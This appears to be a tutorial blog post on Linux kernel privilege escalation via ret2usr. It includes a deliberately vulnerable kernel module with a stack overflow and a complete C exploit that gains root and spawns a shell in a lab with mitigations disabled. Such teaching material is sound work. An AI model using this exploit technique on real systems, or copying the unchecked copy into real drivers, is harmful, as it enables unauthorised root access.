Linux Kernel Exploitation - ret2usr
The goal in userland exploitation is to gain code execution and trick the process to spawn a shell. In kernelland exploitation the main goal is to change the privileges of the current process.
The next section shows a simple vulnerability in a custom kernel module, a stack-based buffer overflow, and describes how to exploit it.
Note: No exploit mitigations such as KASLR, PTI, SMEP or SMAP are in place. Those mitigations and how to bypass them will be explained in following posts.
prerequisite
A description of how to build the debugging environment can be found here: Linux Kernel Exploitation - Environment. That environment is used in this example. During development, the init script should be modified to start a shell with root privileges.
#!/bin/sh
for i in `find ".ko" /modules`
do
insmod $i
done
mount -t proc none /proc
mount -t sysfs none /sys
mdev -s
chmod 666 /dev/stack_bof
exec /bin/sh
#setuidgid 1000 /bin/sh
Once the exploit is finished, the init script should be changed to start the shell with lower privileges.
#!/bin/sh
for i in `find ".ko" /modules`
do
insmod $i
done
mount -t proc none /proc
mount -t sysfs none /sys
mdev -s
chmod 666 /dev/stack_bof
#exec /bin/sh
setuidgid 1000 /bin/sh
vulnerability
The following excerpt shows the source code of the kernel module that is used in this blog post to demonstrate the exploitation approach:
#include <linux/compiler.h>
#include <linux/fs.h>
#include <linux/kernel.h>
#include <linux/miscdevice.h>
#include <linux/module.h>
#include <linux/uaccess.h>
MODULE_DESCRIPTION("vuln1");
MODULE_AUTHOR("sash");
MODULE_LICENSE("GPL");
#define IOCTL_VULN1_WRITE 4141
static int vuln1_open(struct inode *inode, struct file *file)
{
    return 0;
}

static int vuln1_release(struct inode *inodep, struct file *filp)
{
    return 0;
}

static noinline int vuln1_do_breakstuff(unsigned long addr)
{
    char buffer[256];
    volatile int size = 512;

    return _copy_from_user(&buffer, (void __user *)addr, size);
}

static long vuln1_ioctl(struct file *fd, unsigned int cmd, unsigned long value)
{
    long to_return;

    switch (cmd) {
    case IOCTL_VULN1_WRITE:
        to_return = vuln1_do_breakstuff(value);
        break;
    default:
        to_return = -EINVAL;
        break;
    }
    return to_return;
}

static const struct file_operations vuln1_file_ops = {
    .owner = THIS_MODULE,
    .open = vuln1_open,
    .unlocked_ioctl = vuln1_ioctl,
    .release = vuln1_release,
    .llseek = no_llseek,
};

struct miscdevice vuln1_device = {
    .minor = MISC_DYNAMIC_MINOR,
    .name = "vuln",
    .fops = &vuln1_file_ops,
    .mode = 0666,
};

module_misc_device(vuln1_device);
The function vuln1_ioctl is called when the ioctl system call is used on the device. The module provides one command (IOCTL_VULN1_WRITE) for that system call, which internally calls vuln1_do_breakstuff. The function vuln1_do_breakstuff has a very obvious vulnerability: it reads 512 bytes from userspace into a buffer of 256 bytes. The function calls _copy_from_user instead of copy_from_user so that the size checks built into copy_from_user do not catch the buffer overflow.
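To make the missing check concrete, here is a minimal userland sketch of a bounds-checked copy. It is not kernel code: `bounded_copy`, `overflow_bytes` and `VULN1_BUF_SIZE` are hypothetical names introduced for illustration, and `memcpy` stands in for the kernel's user-copy routine.

```c
#include <errno.h>
#include <stddef.h>
#include <string.h>

#define VULN1_BUF_SIZE 256 /* size of the stack buffer in vuln1_do_breakstuff */

/*
 * Hypothetical userland stand-in for a bounds-checked copy.
 * memcpy() replaces the kernel's user-copy routine here.
 */
int bounded_copy(char *dst, size_t dst_size, const char *src, size_t len)
{
    if (len > dst_size)
        return -EINVAL; /* the request would overflow dst: refuse it */
    memcpy(dst, src, len);
    return 0;
}

/* Number of bytes that land behind the buffer for a given copy length. */
size_t overflow_bytes(size_t dst_size, size_t len)
{
    return len > dst_size ? len - dst_size : 0;
}
```

With the sizes from the module, `overflow_bytes(256, 512)` yields 256 bytes written past the buffer, which is more than enough to reach the saved frame pointer and the return address.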
Note: To compile the kernel module, the explanation here can be used. If that is not an option, all resources can be downloaded from here.
The module creates the miscellaneous device /dev/vuln, which can be opened with open() and accessed with the ioctl() syscall.
#include "stdlib.h"
#include "stdio.h"
#include "string.h"
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#define IOCTL_VULN1_WRITE 4141
void ioctl_write(int fd)
{
    char buffer[512];

    /* fill the buffer with 'A' and hand it to the vulnerable ioctl */
    memset(buffer, 0x41, sizeof(buffer));
    ioctl(fd, IOCTL_VULN1_WRITE, &buffer);
}

int main(void)
{
    int fd;

    fd = open("/dev/vuln", 0);
    if (fd < 0) {
        printf("Cannot open device file\n");
        exit(-1);
    }
    ioctl_write(fd);
    close(fd);
    return 0;
}
The device is opened in the main function. The function ioctl_write shows how to write data to the device using the ioctl syscall with the IOCTL_VULN1_WRITE command.
approach
As mentioned before, a userland exploit usually jumps to shellcode that pops a shell. In kernelland, ret2usr is the simplest approach: it does not jump to real shellcode, but to code located in userland that calls kernel functions to change the privileges to root and finally returns to userland.
In this example the most common approach is used:
- Obtain root privileges
- Restore the user context and switch to userland, continuing at a provided function pointer
1. obtain root privileges
The common approach to obtain root privileges is to call prepare_kernel_cred and commit_creds. The following part explains what these functions do and why it makes sense to use them in the exploit.
In the kernel every task (known as a process in userland) is represented by a task_struct structure. That structure holds all information about a task, including its credentials. The credentials are stored in a struct cred, which is referenced by the pointer struct cred *cred that is part of task_struct.
struct task_struct {
#ifdef CONFIG_THREAD_INFO_IN_TASK
    /*
     * For reasons of header soup (see current_thread_info()), this
     * must be the first element of task_struct.
     */
    struct thread_info thread_info;
#endif
    /* -1 unrunnable, 0 runnable, >0 stopped: */
    volatile long state;

    /*
     * This begins the randomizable portion of task_struct. Only
     * scheduling-critical items should be added above here.
     */
    randomized_struct_fields_start

    void *stack;
    refcount_t usage;
    /* Per task flags (PF_*), defined further below: */
    unsigned int flags;
    unsigned int ptrace;
    [...]
    /* Process credentials: */

    /* Tracer's credentials at attach: */
    const struct cred __rcu *ptracer_cred;

    /* Objective and real subjective task credentials (COW): */
    const struct cred __rcu *real_cred;

    /* Effective (overridable) subjective task credentials (COW): */
    const struct cred __rcu *cred;
    [...]
};
As the following excerpt shows, struct cred contains all IDs such as uid, gid, euid and so on.
struct cred {
    atomic_t usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t subscribers; /* number of processes subscribed */
    void *put_addr;
    unsigned magic;
#define CRED_MAGIC 0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
    kuid_t uid; /* real UID of the task */
    kgid_t gid; /* real GID of the task */
    kuid_t suid; /* saved UID of the task */
    kgid_t sgid; /* saved GID of the task */
    kuid_t euid; /* effective UID of the task */
    kgid_t egid; /* effective GID of the task */
    kuid_t fsuid; /* UID for VFS ops */
    kgid_t fsgid; /* GID for VFS ops */
    unsigned securebits; /* SUID-less security management */
    kernel_cap_t cap_inheritable; /* caps our children can inherit */
    kernel_cap_t cap_permitted; /* caps we're permitted */
    kernel_cap_t cap_effective; /* caps we can actually use */
    kernel_cap_t cap_bset; /* capability bounding set */
    kernel_cap_t cap_ambient; /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char jit_keyring; /* default keyring to attach requested
                                * keys to */
    struct key *session_keyring; /* keyring inherited over fork */
    struct key *process_keyring; /* keyring private to this process */
    struct key *thread_keyring; /* keyring private to this thread */
    struct key *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
    void *security; /* LSM security */
#endif
    struct user_struct *user; /* real user ID subscription */
    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
    struct ucounts *ucounts;
    struct group_info *group_info; /* supplementary groups for euid/fsgid */
    /* RCU deletion */
    union {
        int non_rcu; /* Can we skip RCU deletion? */
        struct rcu_head rcu; /* RCU deletion hook */
    };
} __randomize_layout;
The function prepare_kernel_cred returns a pointer to a struct cred.
struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
    const struct cred *old;
    struct cred *new;

    new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
    if (!new)
        return NULL;

    kdebug("prepare_kernel_cred() alloc %p", new);

    if (daemon)
        old = get_task_cred(daemon);
    else
        old = get_cred(&init_cred);

    validate_creds(old);

    *new = *old;
    new->non_rcu = 0;
    atomic_set(&new->usage, 1);
    set_cred_subscribers(new, 0);
    get_uid(new->user);
    get_user_ns(new->user_ns);
    get_group_info(new->group_info);

#ifdef CONFIG_KEYS
    new->session_keyring = NULL;
    new->process_keyring = NULL;
    new->thread_keyring = NULL;
    new->request_key_auth = NULL;
    new->jit_keyring = KEY_REQKEY_DEFL_THREAD_KEYRING;
#endif

#ifdef CONFIG_SECURITY
    new->security = NULL;
#endif
    new->ucounts = get_ucounts(new->ucounts);
    if (!new->ucounts)
        goto error;

    if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
        goto error;

    put_cred(old);
    validate_creds(new);
    return new;

error:
    put_cred(new);
    put_cred(old);
    return NULL;
}
EXPORT_SYMBOL(prepare_kernel_cred);
The function expects a pointer to a struct task_struct as its argument, which may be NULL. If the argument is not NULL, the credentials (struct cred) are read from that task. If the argument is NULL, a reference to init_cred is used. init_cred is a prepared struct cred that is used for the initial task and represents root.
struct cred init_cred = {
    .usage = ATOMIC_INIT(4),
#ifdef CONFIG_DEBUG_CREDENTIALS
    .subscribers = ATOMIC_INIT(2),
    .magic = CRED_MAGIC,
#endif
    .uid = GLOBAL_ROOT_UID,
    .gid = GLOBAL_ROOT_GID,
    .suid = GLOBAL_ROOT_UID,
    .sgid = GLOBAL_ROOT_GID,
    .euid = GLOBAL_ROOT_UID,
    .egid = GLOBAL_ROOT_GID,
    .fsuid = GLOBAL_ROOT_UID,
    .fsgid = GLOBAL_ROOT_GID,
    .securebits = SECUREBITS_DEFAULT,
    .cap_inheritable = CAP_EMPTY_SET,
    .cap_permitted = CAP_FULL_SET,
    .cap_effective = CAP_FULL_SET,
    .cap_bset = CAP_FULL_SET,
    .user = INIT_USER,
    .user_ns = &init_user_ns,
    .group_info = &init_groups,
    .ucounts = &init_ucounts,
};
That means that a call to prepare_kernel_cred(NULL) returns a pointer to a struct cred with root permissions. To assign those new credentials, the function commit_creds is used. It expects the new credentials as its argument and assigns them to the current task.
To give the current task root privileges, a single call is enough: commit_creds(prepare_kernel_cred(NULL));
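The effect of that call can be illustrated with a small userland model. This is only a sketch: all `model_*` names are hypothetical, the structures keep just a handful of fields, and unlike the real commit_creds (which always acts on the current task) the model takes the task as an explicit parameter.

```c
#include <stddef.h>

/* Hypothetical, heavily simplified stand-ins for struct cred / task_struct. */
struct model_cred {
    unsigned int uid, gid, euid, egid;
};

struct model_task {
    const struct model_cred *real_cred;
    const struct model_cred *cred;
};

/* Plays the role of init_cred: every ID is 0 (root). */
const struct model_cred model_init_cred = { 0, 0, 0, 0 };

/* Storage for the single copy this model hands out (the kernel uses a slab cache). */
struct model_cred model_new_cred;

/* Model of prepare_kernel_cred(): copy the daemon's creds, or init_cred if daemon is NULL. */
struct model_cred *model_prepare_kernel_cred(const struct model_task *daemon)
{
    model_new_cred = daemon ? *daemon->cred : model_init_cred;
    return &model_new_cred;
}

/* Model of commit_creds(): install the new credentials on the given task. */
int model_commit_creds(struct model_task *task, const struct model_cred *new_cred)
{
    task->real_cred = new_cred;
    task->cred = new_cred;
    return 0;
}
```

A task that starts with uid 1000 ends up with uid 0 after `model_commit_creds(&task, model_prepare_kernel_cred(NULL))`, which mirrors what the exploit achieves for the current process.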
2. restore user context and switch to userland
The last step of the exploit is to jump to a function located in userland. If the exploit jumped to the userland function immediately after obtaining root privileges, important registers such as RSP, RFLAGS and the segment registers CS and SS would still hold kernelland values. Kernel segments and the kernel stack are not accessible from userland, so the exploit has to restore the registers manually. To do that, the user context (all necessary registers) has to be saved before switching to kernelland (the ioctl call).
unsigned long u_cs;
unsigned long u_ss;
unsigned long u_rsp;
unsigned long u_rflags;
unsigned long u_rip;
void save_state() {
    __asm__(
        ".intel_syntax noprefix;"
        "mov u_cs, cs;"
        "mov u_ss, ss;"
        "mov u_rsp, rsp;"
        "pushf;"
        "pop u_rflags;"
        ".att_syntax;"
    );
    u_rip = (unsigned long)&start_sh;
}
The current RIP is not saved. Instead, u_rip is set to the address of a function that runs everything that should be executed with elevated privileges after the privilege escalation. In this example that function starts a shell.
void start_sh() {
    char *args[] = {"/bin/sh", "-i", NULL};
    execve("/bin/sh", args, NULL);
}
The GS register does not need to be saved because it can be restored with the swapgs instruction. swapgs is a privileged instruction that swaps the GS base between its kernelland and userland values.
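The save_state function above references global variables directly from inline assembly, which tends to require a non-PIE build such as the static one used in this post. As an alternative, the following sketch captures the same values through GCC/Clang extended asm output operands. It assumes x86-64 and a GCC-compatible compiler; `struct user_state` and `capture_user_state` are hypothetical names, not part of the original exploit.

```c
#include <stdint.h>

/* Hypothetical container for the values that save_state() keeps in globals. */
struct user_state {
    uint64_t cs, ss, rsp, rflags;
};

/* Assumes x86-64 and GCC or Clang. */
void capture_user_state(struct user_state *st)
{
    /* segment selectors are zero-extended into the 64-bit destination */
    __asm__ volatile("mov %%cs, %0" : "=r"(st->cs));
    __asm__ volatile("mov %%ss, %0" : "=r"(st->ss));
    /* stack pointer at the time of the call */
    __asm__ volatile("mov %%rsp, %0" : "=r"(st->rsp));
    /* compiler builtin that reads RFLAGS without hand-written push/pop */
    st->rflags = __builtin_ia32_readeflags_u64();
}
```

In a userland process the two low bits of the captured CS and SS selectors are 3, the requested privilege level of ring 3. These are exactly the values the kernel stack frame must contain again before returning to userland.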
Since all necessary values are saved, they can be restored after the call to commit_creds.
void restore_state() {
    __asm__(
        ".intel_syntax noprefix;"
        "swapgs;"          // restore the userland gs base
        "push u_ss;"       // push all other values onto the stack
        "push u_rsp;"      // in the order iretq expects them
        "push u_rflags;"
        "push u_cs;"
        "push u_rip;"      // points to start_sh
        "iretq;"
        ".att_syntax;"
    );
}
All saved values are pushed onto the stack because the iretq instruction restores them automatically. iretq returns from an interrupt or exception handler: it pops RIP, CS, RFLAGS, RSP and SS from the stack, similar to how ret pops the return address for a function call. Executing iretq therefore leaves the kernel and switches back to userland. Since the saved u_rip points to start_sh, that function is executed after the return.
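The push order in restore_state follows from the stack layout that iretq consumes in 64-bit mode. The sketch below writes that layout down as a C struct, lowest address first; `struct iret_frame` and `make_iret_frame` are hypothetical names used only for illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Stack layout consumed by iretq, lowest address (top of stack) first. */
struct iret_frame {
    uint64_t rip;    /* popped first: where execution continues */
    uint64_t cs;     /* code segment selector */
    uint64_t rflags; /* flags register */
    uint64_t rsp;    /* stack pointer to switch to */
    uint64_t ss;     /* popped last: stack segment selector */
};

/* Build a frame from previously saved values. */
struct iret_frame make_iret_frame(uint64_t rip, uint64_t cs, uint64_t rflags,
                                  uint64_t rsp, uint64_t ss)
{
    struct iret_frame f = { rip, cs, rflags, rsp, ss };
    return f;
}
```

Because the stack grows downwards, the values have to be pushed in reverse order of the struct fields: SS first and RIP last, which is what restore_state does.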
exploit
Now put everything together for a working exploit.
- Find the addresses of commit_creds and prepare_kernel_cred
- Save user state
- Overflow the buffer and overwrite the return address with the address of a function that does the following:
  - Call commit_creds(prepare_kernel_cred(NULL))
  - Restore user state and execute iretq
All necessary functions are shown above. The only things still missing are the addresses of the commit_creds and prepare_kernel_cred functions and the offset from the beginning of the buffer to the return address.
The addresses of the functions can be found in several ways:
- Looking up the addresses in /proc/kallsyms
- Printing the addresses in gdb
Root permissions are necessary to read the kernel symbols from /proc/kallsyms.
# cat /proc/kallsyms | grep prepare_kernel_cred
ffffffff810d2950 T prepare_kernel_cred
# cat /proc/kallsyms | grep commit_creds
ffffffff810d26f0 T commit_creds
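The same lookup can be done programmatically. The following sketch parses lines in the format shown above and matches the symbol name exactly, which avoids the substring matches that grep can produce. `kallsyms_match` and `lookup_kallsyms` are hypothetical helper names, and the lookup only returns useful addresses when the file is read with sufficient privileges.

```c
#include <stdio.h>
#include <string.h>

/*
 * Parse one line in /proc/kallsyms format ("<hex address> <type> <name>").
 * Returns 1 and stores the address if the line describes `name`, else 0.
 */
int kallsyms_match(const char *line, const char *name, unsigned long *addr)
{
    unsigned long value;
    char type;
    char sym[256];

    if (sscanf(line, "%lx %c %255s", &value, &type, sym) != 3)
        return 0;
    if (strcmp(sym, name) != 0)
        return 0;
    *addr = value;
    return 1;
}

/* Scan /proc/kallsyms for an exact symbol name; returns 0 if not found or unreadable. */
unsigned long lookup_kallsyms(const char *name)
{
    FILE *fp = fopen("/proc/kallsyms", "r");
    char line[512];
    unsigned long addr = 0;

    if (!fp)
        return 0;
    while (fgets(line, sizeof(line), fp)) {
        if (kallsyms_match(line, name, &addr))
            break;
    }
    fclose(fp);
    return addr;
}
```

In the debugging environment, `lookup_kallsyms("commit_creds")` run as root should yield the address printed by the grep command above. Since no KASLR is active, that address stays the same across reboots and can be hard-coded in the exploit.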
The offset can easily be read from the disassembly of the function:
;-- vuln1_do_breakstuff:
; CALL XREF from sub.vuln1_ioctl_80000f0 @ 0x8000104(x)
┌ 50: sub.vuln1_do_breakstuff_80000b0 ();
│ ; var int64_t var_100h @ rbp-0x100
│ ; var int64_t var_104h @ rbp-0x104
│ 0x080000b0 e800000000 call __fentry__ ; RELOC 32 __fentry__
│ ; CALL XREF from sub.vuln1_do_breakstuff_80000b0 @ 0x80000b0(x)
│ 0x080000b5 55 push rbp
│ 0x080000b6 4889fe mov rsi, rdi
│ 0x080000b9 4889e5 mov rbp, rsp
│ 0x080000bc 4881ec0801.. sub rsp, 0x108
│ 0x080000c3 c785fcfeff.. mov dword [var_104h], 0x200 ; 512
│ 0x080000cd 486395fcfe.. movsxd rdx, dword [var_104h]
│ 0x080000d4 488dbd00ff.. lea rdi, [var_100h]
│ 0x080000db e800000000 call _copy_from_user ; RELOC 32 _copy_from_user
│ ; CALL XREF from sub.vuln1_do_breakstuff_80000b0 @ 0x80000db(x)
│ 0x080000e0 c9 leave
└ 0x080000e1 c3 ret
At address 0x080000d4 the address of the buffer is loaded into RDI as the first argument of the call to _copy_from_user. So the buffer starts at RBP-0x100, which means the offset from the buffer to RBP is 0x100. RBP points to the saved frame pointer. The value right after the saved frame pointer is the return address, so the offset from the beginning of the buffer to the return address is 0x108.
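The offset arithmetic and the resulting payload layout can be sketched as follows. The macro and function names are hypothetical; the numbers are the ones read from the disassembly above, and the target address is a placeholder supplied by the caller.

```c
#include <stddef.h>
#include <string.h>

#define BUF_TO_RBP   0x100 /* buffer starts at rbp-0x100 */
#define SAVED_RBP_SZ 8     /* saved frame pointer sits at rbp */
#define RET_OFFSET   (BUF_TO_RBP + SAVED_RBP_SZ) /* 0x108 */

/*
 * Fill the payload with padding and place `target` where the return
 * address is located. Returns -1 if the payload is too short.
 */
int build_payload(unsigned char *payload, size_t len, unsigned long target)
{
    if (len < RET_OFFSET + sizeof(target))
        return -1;
    memset(payload, 0x41, len);
    memcpy(payload + RET_OFFSET, &target, sizeof(target));
    return 0;
}
```

Using memcpy instead of a pointer cast avoids unaligned-access and aliasing concerns, although on x86-64 the cast used in the exploit below works as well.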
The following excerpt shows the exploit:
#include "stdlib.h"
#include "stdio.h"
#include "string.h"
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#define IOCTL_VULN1_WRITE 4141
#define COMMIT_CREDS_ADDRESS 0xffffffff810d26f0ul
#define PREPARE_KERNEL_CRED_ADDRESS 0xffffffff810d2950ul
typedef int (* t_commit_creds)(void *);
typedef void *(* t_prepare_kernel_cred)(void *);

t_commit_creds commit_creds = (t_commit_creds)COMMIT_CREDS_ADDRESS;
t_prepare_kernel_cred prepare_kernel_cred = (t_prepare_kernel_cred)PREPARE_KERNEL_CRED_ADDRESS;

unsigned long u_cs;
unsigned long u_ss;
unsigned long u_rsp;
unsigned long u_rflags;
unsigned long u_rip;

void start_sh() {
    char *args[] = {"/bin/sh", "-i", NULL};
    execve("/bin/sh", args, NULL);
}

void save_state() {
    __asm__(
        ".intel_syntax noprefix;"
        "mov u_cs, cs;"
        "mov u_ss, ss;"
        "mov u_rsp, rsp;"
        "pushf;"
        "pop u_rflags;"
        ".att_syntax;"
    );
    u_rip = (unsigned long)&start_sh;
}

void restore_state() {
    __asm__(
        ".intel_syntax noprefix;"
        "swapgs;"          // restore the userland gs base
        "push u_ss;"       // push all other values onto the stack
        "push u_rsp;"      // in the order iretq expects them
        "push u_rflags;"
        "push u_cs;"
        "push u_rip;"      // points to start_sh
        "iretq;"
        ".att_syntax;"
    );
}

// runs in kernel mode after the overwritten return address is used
void exploit() {
    commit_creds(prepare_kernel_cred(NULL));
    restore_state();
}

void ioctl_write(int fd) {
    char buffer[512];

    memset(buffer, 0x41, sizeof(buffer));
    // overwrite return address
    *(unsigned long *)&buffer[0x108] = (unsigned long) &exploit;
    // save user state
    save_state();
    // ioctl syscall
    ioctl(fd, IOCTL_VULN1_WRITE, &buffer);
}

int main(void)
{
    int fd;

    // open the device
    fd = open("/dev/vuln", 0);
    if (fd < 0) {
        printf("Cannot open device file\n");
        exit(-1);
    }
    ioctl_write(fd);
    close(fd);
    return 0;
}
The exploit needs to be statically compiled with gcc -static vuln1_exploit.c -o vuln1_exploit and then put into the initramfs file.
Furthermore, chmod 666 /dev/vuln should be added to the init script to ensure that the device can be accessed by a normal user.
All materials can be found on https://github.com/sashs/linux_kernel_exploitation.
resources
- ioctl - https://docs.kernel.org/driver-api/ioctl.html
- Writing misc device drivers - https://embetronicx.com/tutorials/linux/device-drivers/misc-device-driver/
- module_misc_device - https://elixir.bootlin.com/linux/v5.13.19/source/include/linux/miscdevice.h#L105
- https://elixir.bootlin.com/linux/v5.13.19/source/include/linux/sched.h#L657
- https://elixir.bootlin.com/linux/v5.13.19/source/kernel/cred.c#L449
- https://elixir.bootlin.com/linux/v5.13.19/source/include/linux/cred.h#L110
- https://elixir.bootlin.com/linux/v5.13.19/source/kernel/cred.c#L719
- https://elixir.bootlin.com/linux/v5.13.19/source/kernel/cred.c#L41
- swapgs - https://www.kernel.org/doc/Documentation/x86/entry_64.txt